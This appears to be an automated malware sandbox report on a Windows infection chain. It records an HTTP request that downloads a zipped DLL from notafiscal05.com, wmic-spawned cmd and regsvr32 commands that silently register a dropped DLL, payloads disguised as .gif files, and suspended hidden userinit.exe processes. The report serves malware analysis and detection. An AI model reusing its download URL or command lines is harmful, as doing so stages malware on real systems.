User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Server Name	xbr6lge984320911.notafiscal05.com
Server Port	80
Data Sent	396
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = xbr6lge984320911.notafiscal05.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /04/marxvxinhhmhh.dll.zip	1	Fn
Send HTTP Request	url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?86737238	1	Fn

Process #22: cmd.exe

64

0

»

Information	Value
ID	#22
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /k echo %time% && timeout 5 > NUL && exit
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:20, Reason: Child Process
Unmonitor	End Time: 00:01:26, Reason: Self Terminated
Monitor Duration	00:00:06

OS Process Information

»

Information	Value
PID	0xec0
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x EC4

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	r	-
private_0x00000000000d0000	0x000d0000	0x001cffff	Private Memory	rw	-
pagefile_0x00000000001d0000	0x001d0000	0x001d1fff	Pagefile Backed Memory	rw	-
private_0x00000000001e0000	0x001e0000	0x001e0fff	Private Memory	rw	-
private_0x00000000001f0000	0x001f0000	0x002effff	Private Memory	rw	-
pagefile_0x00000000002f0000	0x002f0000	0x003b7fff	Pagefile Backed Memory	r	-
private_0x00000000003c0000	0x003c0000	0x003c0fff	Private Memory	rw	-
private_0x00000000004c0000	0x004c0000	0x004cffff	Private Memory	rw	-
pagefile_0x00000000004d0000	0x004d0000	0x005d0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000005e0000	0x005e0000	0x011dffff	Pagefile Backed Memory	r	-
pagefile_0x00000000011e0000	0x011e0000	0x01342fff	Pagefile Backed Memory	r	-
cmd.exe	0x4a520000	0x4a56bfff	Memory Mapped File	rwx	-
winbrand.dll	0x6ce00000	0x6ce06fff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd9000	0x7ffd9000	0x7ffd9fff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

File (23)

»

Operation	Filename	Additional Information	Count	Logfile
Create	NUL	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\Windows\system32	type = file_attributes	1	Fn
Get Info	C:\Windows\System32	type = file_attributes	1	Fn
Get Info	STD_OUTPUT_HANDLE	type = file_type	3	Fn
Open	STD_OUTPUT_HANDLE	-	14	Fn
Open	STD_INPUT_HANDLE	-	2	Fn
Write	STD_OUTPUT_HANDLE	size = 14	1	Fn Data

Registry (17)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Module (8)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\cmd.exe	base_address = 0x4a520000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Filename	-	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CopyFileExW, address_out = 0x753aac6c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsDebuggerPresent, address_out = 0x753b3ea8	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x753c2732	1	Fn

System (3)

»

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2018-10-22 05:27:08 (UTC)		2	Fn
Get Time	type = Ticks, time = 138856		1	Fn

Environment (11)

»

Operation	Additional Information	Count	Logfile
Get Environment String	-	3	Fn Data
Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	2	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Get Environment String	name = time	1	Fn
Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn

Process #23: timeout.exe

74

0

»

Information	Value
ID	#23
File Name	c:\windows\system32\timeout.exe
Command Line	timeout 5
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:20, Reason: Child Process
Unmonitor	End Time: 00:01:25, Reason: Self Terminated
Monitor Duration	00:00:05

OS Process Information

»

Information	Value
PID	0xed8
Parent PID	0xec0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x EDC

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x00013fff	Pagefile Backed Memory	r	-
timeout.exe	0x00020000	0x00029fff	Memory Mapped File	rwx	-
private_0x0000000000030000	0x00030000	0x0004ffff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x0003ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000040000	0x00040000	0x0004ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000050000	0x00050000	0x00050fff	Pagefile Backed Memory	r	-
locale.nls	0x00060000	0x000c6fff	Memory Mapped File	r	-
pagefile_0x00000000000d0000	0x000d0000	0x000d6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000e0000	0x000e0000	0x000e1fff	Pagefile Backed Memory	rw	-
timeout.exe.mui	0x000f0000	0x000f1fff	Memory Mapped File	rw	-
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	rw	-
private_0x0000000000110000	0x00110000	0x00110fff	Private Memory	rw	-
private_0x0000000000130000	0x00130000	0x0016ffff	Private Memory	rw	-
private_0x0000000000190000	0x00190000	0x0028ffff	Private Memory	rw	-
pagefile_0x0000000000290000	0x00290000	0x00357fff	Pagefile Backed Memory	r	-
private_0x00000000003f0000	0x003f0000	0x003fffff	Private Memory	rw	-
pagefile_0x0000000000400000	0x00400000	0x00500fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000510000	0x00510000	0x0110ffff	Pagefile Backed Memory	r	-
sortdefault.nls	0x01110000	0x013defff	Memory Mapped File	r	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
ws2_32.dll	0x756c0000	0x756f4fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
nsi.dll	0x76f10000	0x76f15fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd6000	0x7ffd6000	0x7ffd6fff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

File (28)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_INPUT_HANDLE	type = file_type	1	Fn
Get Info	STD_OUTPUT_HANDLE	type = file_type	8	Fn
Open	STD_INPUT_HANDLE	-	2	Fn
Open	STD_OUTPUT_HANDLE	-	17	Fn

Module (2)

»

Operation	Module	Additional Information	Success	Count	Logfile
Get Handle	c:\windows\system32\timeout.exe	base_address = 0x20000		1	Fn
Get Filename	-	process_name = c:\windows\system32\timeout.exe, file_name_orig = C:\Windows\system32\timeout.exe, size = 260		1	Fn

System (44)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = 100 milliseconds (0.100 seconds)	42	Fn
Get Time	type = System Time, time = 2018-10-22 05:27:08 (UTC)	1	Fn
Get Time	type = Ticks, time = 138965	1	Fn

Process #24: regsvr32.exe

690

0

»

Information	Value
ID	#24
File Name	c:\windows\system32\regsvr32.exe
Command Line	"C:\Windows\System32\regsvr32.exe" /s "C:\ProgramData\xxx6000137xx\marxvxinhhm64528113361.dll"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:25, Reason: Child Process
Unmonitor	End Time: 00:04:31, Reason: Terminated by Timeout
Monitor Duration	00:03:06

OS Process Information

»

Information	Value
PID	0xf0c
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x F10

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00041fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000050000	0x00050000	0x00051fff	Pagefile Backed Memory	rw	-
regsvr32.exe.mui	0x00060000	0x00061fff	Memory Mapped File	rw	-
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	rw	-
private_0x0000000000080000	0x00080000	0x00080fff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x00091fff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x00090fff	Private Memory	rwx	-
pagefile_0x00000000000a0000	0x000a0000	0x000a1fff	Pagefile Backed Memory	r	-
private_0x00000000000b0000	0x000b0000	0x000effff	Private Memory	rw	-
locale.nls	0x000f0000	0x00156fff	Memory Mapped File	r	-
rpcss.dll	0x00160000	0x001bbfff	Memory Mapped File	r	-
private_0x0000000000160000	0x00160000	0x00160fff	Private Memory	rw	-
private_0x0000000000160000	0x00160000	0x00164fff	Private Memory	rw	-
private_0x0000000000160000	0x00160000	0x00161fff	Private Memory	rw	-
private_0x0000000000160000	0x00160000	0x00176fff	Private Memory	rw	-
private_0x0000000000160000	0x00160000	0x001befff	Private Memory	rwx	-
private_0x00000000001c0000	0x001c0000	0x001c0fff	Private Memory	rw	-
private_0x00000000001e0000	0x001e0000	0x002dffff	Private Memory	rw	-
pagefile_0x00000000002e0000	0x002e0000	0x003a7fff	Pagefile Backed Memory	r	-
private_0x0000000000400000	0x00400000	0x0040ffff	Private Memory	rw	-
pagefile_0x0000000000410000	0x00410000	0x00510fff	Pagefile Backed Memory	r	-
private_0x0000000000520000	0x00520000	0x0068ffff	Private Memory	rw	-
pagefile_0x0000000000520000	0x00520000	0x005fefff	Pagefile Backed Memory	r	-
private_0x0000000000650000	0x00650000	0x0068ffff	Private Memory	rw	-
marxvxinhhm64528113361.dll	0x00690000	0x007a7fff	Memory Mapped File	rwx	... Region Actions Download Dump
private_0x00000000007b0000	0x007b0000	0x00899fff	Private Memory	rw	-
private_0x00000000007b0000	0x007b0000	0x008effff	Private Memory	rw	-
marxvxinhhm98.dll	0x008f0000	0x00a08fff	Memory Mapped File	rwx	... Region Actions Download Dump
regsvr32.exe	0x00a40000	0x00a46fff	Memory Mapped File	rwx	-
pagefile_0x0000000000a50000	0x00a50000	0x0164ffff	Pagefile Backed Memory	r	-
private_0x0000000001650000	0x01650000	0x0173afff	Private Memory	rw	-
private_0x0000000001650000	0x01650000	0x0178ffff	Private Memory	rw	-
private_0x0000000001790000	0x01790000	0x0188ffff	Private Memory	-	-
private_0x0000000001890000	0x01890000	0x0190ffff	Private Memory	rw	-
private_0x0000000001910000	0x01910000	0x01a0ffff	Private Memory	-	-
private_0x0000000001a10000	0x01a10000	0x01b0ffff	Private Memory	-	-
private_0x0000000001b10000	0x01b10000	0x01c0ffff	Private Memory	-	-
private_0x0000000001c10000	0x01c10000	0x01d0ffff	Private Memory	-	-
private_0x0000000001d10000	0x01d10000	0x01e0ffff	Private Memory	-	-
private_0x0000000001e10000	0x01e10000	0x01f0ffff	Private Memory	-	-
private_0x0000000001f10000	0x01f10000	0x0200ffff	Private Memory	-	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
private_0x000000007ff50000	0x7ff50000	0x7ffaffff	Private Memory	rw	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

File (44)

»

Operation	Filename	Additional Information	Count	Logfile
Create	c:\programdata\tempa\marxvxinhhmxa.gif	-	1	Fn
Create	c:\programdata\tempa\marxvxinhhmxb.gif	-	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\tempa\marxvxinhhmgx.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Get Info	c:\programdata\tempa\marxvxinhhmxa.gif	type = size	1	Fn
Get Info	c:\programdata\tempa\marxvxinhhmxb.gif	type = size	1	Fn
Read	c:\programdata\tempa\marxvxinhhmxa.gif	size = 191488	1	Fn Data
Read	c:\programdata\tempa\marxvxinhhmxb.gif	size = 179712	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data
Read	C:\ProgramData\tempa\marxvxinhhmgx.gif	size = 385024, size_out = 385024	1	Fn Data

Registry (37)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CLASSES_ROOT\.dll	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\dllfile	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\dllfile\AutoRegister	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Embarcadero\Locales	-	4	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Embarcadero\Locales	-	4	Fn
Open Key	HKEY_CURRENT_USER\Software\CodeGear\Locales	-	4	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\CodeGear\Locales	-	4	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	5	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	5	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	1	Fn
Read Value	HKEY_CLASSES_ROOT\.dll	data = dllfile	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes	value_name = MS Shell Dlg 2, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes	value_name = MS Shell Dlg 2, data = Tahoma, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes	value_name = MS Shell Dlg 2, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes	value_name = MS Shell Dlg 2, data = Tahoma, type = REG_SZ	1	Fn

Process (18)

»

Operation	Process	Additional Information	Count	Logfile
Create	C:\Windows\System32\userinit.exe	os_pid = 0xf48, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0xf7c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0xfa4, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0xfd0, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x824, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x888, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x734, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x710, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x850, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x1c0, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
